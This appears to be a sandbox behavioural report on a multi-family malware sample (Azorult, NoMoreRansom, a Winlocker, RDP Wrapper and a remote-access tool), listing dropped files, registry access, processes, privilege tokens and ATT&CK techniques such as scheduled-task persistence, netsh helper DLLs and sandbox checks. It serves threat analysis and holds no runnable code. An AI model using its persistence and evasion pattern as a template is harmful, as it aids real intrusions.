File created	C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe	msiexec.exe
File created	C:\Program Files (x86)\Windows\Error file remover\Windows Logoff Sound.wav	msiexec.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe

Drops file in Windows directory 22 IoCs

Processes:

msiexec.exelua.exeMsiExec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSIE32C.tmp	msiexec.exe
File created	C:\Windows\Setup\Scripts\ErrorHandler.cmd	lua.exe
File created	C:\Windows\Installer\e63e12e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e63e12e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE1EA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE26A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE2FA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE30C.tmp	msiexec.exe
File created	C:\Windows\Tasks\sys.job	MsiExec.exe
File opened for modification	C:\Windows\Installer\MSIE20B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE2FB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE36B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE3DA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE467.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE17C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE24A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE28B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE2AB.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C452D4E2-DE24-48B6-B5C3-ACB240A01606}	msiexec.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2488	sc.exe
4400	sc.exe
4476	sc.exe
1552	sc.exe
688	sc.exe
2164	sc.exe
32	sc.exe
2680	sc.exe
2776	sc.exe
2484	sc.exe
4664	sc.exe
3108	sc.exe
4760	sc.exe
4420	sc.exe
740	sc.exe
1688	sc.exe
4600	sc.exe
3636	sc.exe
4952	sc.exe
1408	sc.exe
5060	sc.exe
3364	sc.exe
64	sc.exe
3636	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

icacls.exeicacls.exeschtasks.exerutserv.exesc.exesc.execmd.exeicacls.exeicacls.exetimeout.exesc.execmd.exeicacls.execmd.execmd.execmd.exeicacls.exesys3.exeNoMoreRansom.execmd.exeicacls.exeicacls.execmd.execmd.exenetsh.execmd.exenet.exeregedit.execmd.exeicacls.execmd.execmd.exeicacls.exeicacls.exereg.execmd.exenet1.exelua.exeWScript.execmd.execmd.execmd.exenet.exeink.exenetsh.exeicacls.exereg.execmd.exewinlogon.execmd.exeicacls.exeWScript.exeicacls.exeicacls.exewini.execmd.execmd.execmd.execmd.exeicacls.execmd.exeschtasks.exeattrib.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sys3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NoMoreRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lua.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ink.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winlogon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

winit.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 7 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4220 timeout.exe
540 timeout.exe
4456 timeout.exe
2888 timeout.exe
5768 timeout.exe
5632 timeout.exe
4092 timeout.exe

pid	process
4220	timeout.exe
540	timeout.exe
4456	timeout.exe
2888	timeout.exe
5768	timeout.exe
5632	timeout.exe
4092	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

4924 ipconfig.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3788 taskkill.exe
2928 taskkill.exe
5016 taskkill.exe
5004 taskkill.exe
380 taskkill.exe

pid	process
4924	ipconfig.exe

pid	process
3788	taskkill.exe
2928	taskkill.exe
5016	taskkill.exe
5004	taskkill.exe
380	taskkill.exe

Modifies data under HKEY_USERS 18 IoCs

Processes:

LogonUI.exemsiexec.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "232"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe

Modifies registry class 7 IoCs

Processes:

R8.execmd.exemsedge.exewini.exewinit.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe

NTFS ADS 6 IoCs

Processes:

PowerPoint.exemsedge.exetaskhostw.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\sys3.exe\:SmartScreen:$DATA	PowerPoint.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 324449.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 550935.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 677075.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 62723.crdownload:SmartScreen	msedge.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

1768 regedit.exe
4608 regedit.exe
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4544 schtasks.exe
5016 schtasks.exe
6088 schtasks.exe
5788 schtasks.exe
5616 schtasks.exe
3608 schtasks.exe

pid	process
1768	regedit.exe
4608	regedit.exe

pid	process
4544	schtasks.exe
5016	schtasks.exe
6088	schtasks.exe
5788	schtasks.exe
5616	schtasks.exe
3608	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exeNoMoreRansom.exemsedge.exe607B60AD512C50B7D71DCCC057E85F1C.exemsedge.exeAzorult.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exewinit.exe

pid	process
4396	msedge.exe
4396	msedge.exe
1704	msedge.exe
1704	msedge.exe
1116	identity_helper.exe
1116	identity_helper.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
688	msedge.exe
688	msedge.exe
4716	NoMoreRansom.exe
4716	NoMoreRansom.exe
4716	NoMoreRansom.exe
4716	NoMoreRansom.exe
1676	msedge.exe
1676	msedge.exe
4184	607B60AD512C50B7D71DCCC057E85F1C.exe
4184	607B60AD512C50B7D71DCCC057E85F1C.exe
5100	msedge.exe
5100	msedge.exe
696	Azorult.exe
696	Azorult.exe
696	Azorult.exe
696	Azorult.exe
696	Azorult.exe
696	Azorult.exe
696	Azorult.exe
696	Azorult.exe
696	Azorult.exe
696	Azorult.exe
4508	rutserv.exe
4508	rutserv.exe
4508	rutserv.exe
4508	rutserv.exe
4508	rutserv.exe
4508	rutserv.exe
64	rutserv.exe
64	rutserv.exe
2044	rutserv.exe
2044	rutserv.exe
3360	rutserv.exe
3360	rutserv.exe
3360	rutserv.exe
3360	rutserv.exe
3360	rutserv.exe
3360	rutserv.exe
1116	rfusclient.exe
1116	rfusclient.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe
3536	winit.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskhostw.exe

pid process

180 taskhostw.exe
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

636
636
636

pid	process
180	taskhostw.exe

pid	process
636
636
636

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

msedge.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

rfusclient.exe

pid process

744 rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rutserv.exerutserv.exerutserv.exemsiexec.exeWinlockerVB6Blacksod.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	4508	rutserv.exe
Token: SeDebugPrivilege	2044	rutserv.exe
Token: SeTakeOwnershipPrivilege	3360	rutserv.exe
Token: SeTcbPrivilege	3360	rutserv.exe
Token: SeTcbPrivilege	3360	rutserv.exe
Token: SeSecurityPrivilege	3620	msiexec.exe
Token: SeCreateTokenPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeAssignPrimaryTokenPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeLockMemoryPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeIncreaseQuotaPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeMachineAccountPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeTcbPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeSecurityPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeTakeOwnershipPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeLoadDriverPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeSystemProfilePrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeSystemtimePrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeProfSingleProcessPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeIncBasePriorityPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeCreatePagefilePrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeCreatePermanentPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeBackupPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeRestorePrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeShutdownPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeDebugPrivilege	3068	WinlockerVB6Blacksod.exe
